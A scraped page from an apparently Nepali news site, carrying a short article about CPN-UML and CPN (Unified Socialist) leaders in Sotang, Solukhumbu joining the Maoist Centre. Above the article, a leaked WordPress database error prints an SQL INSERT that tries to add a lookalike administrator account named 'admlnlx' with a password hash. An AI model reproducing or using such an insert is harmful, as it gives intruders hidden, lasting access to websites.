WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bgy4TEs5htO4X2NuF7kczjdG5nUusl.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:12:10', '', 'admlnlx', 'admlnlx')

सोताङमा एमाले र नेकपा एसका प्रभावशाली नेताहरु माओवादी केन्द्र प्रवेश – Gaule Khabar

सोताङमा एमाले र नेकपा एसका प्रभावशाली नेताहरु माओवादी केन्द्र प्रवेश

सोताङमा एमाले र नेकपा एसका प्रभावशाली नेताहरु माओवादी केन्द्र प्रवेश

काठमाण्डौ । सोलुखुम्बुमा नेकपा एमाले र नेकपा (एकिकृत समाजवादी)का नेता तथा कार्यकर्ता नेकपा (माओवादी केन्द्र) प्रवेश गरेका छन् ।

एमालेका जिल्ला कमिटी सदस्य तथा प्रदेश पर्यटन बोर्ड सदस्य भिमराज राई, नेकपा एसका प्रदेश कमिटी सदस्य जुद्ध बहादुर कार्की सहित एमालेका सय भन्दा बढि कार्यकर्ता माओवादी केन्द्र प्रवेश गरेका हुन् । नवप्रवेशी राई एमालेमा प्रभावशाली नेताका रुपमा चिनिन्छिन् भने कार्की नेकपा एसमा लागेका थिए ।

सोताङ गाउँपालिकामा उम्मेदवार घोषणा तथा पार्टी प्रवेश कार्यक्रममा नवप्रवेशी नेता तथा कार्यकर्तालाई माओवादी केन्द्रका इन्जार्च तथा प्रतिनिधि सभा सदस्य हेम कुमार राई ‘शुरवीर’ले खादा र अविर लगाएर स्वागत गरेका छन् ।

माओवादी केन्द्र जिल्ला समन्वय समिति संयोजक असिम राई लगायतका जिल्ला तथा पालिकास्तरका नेता तथा कार्यकर्ताको उपस्थिती रहेको छ ।

 

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका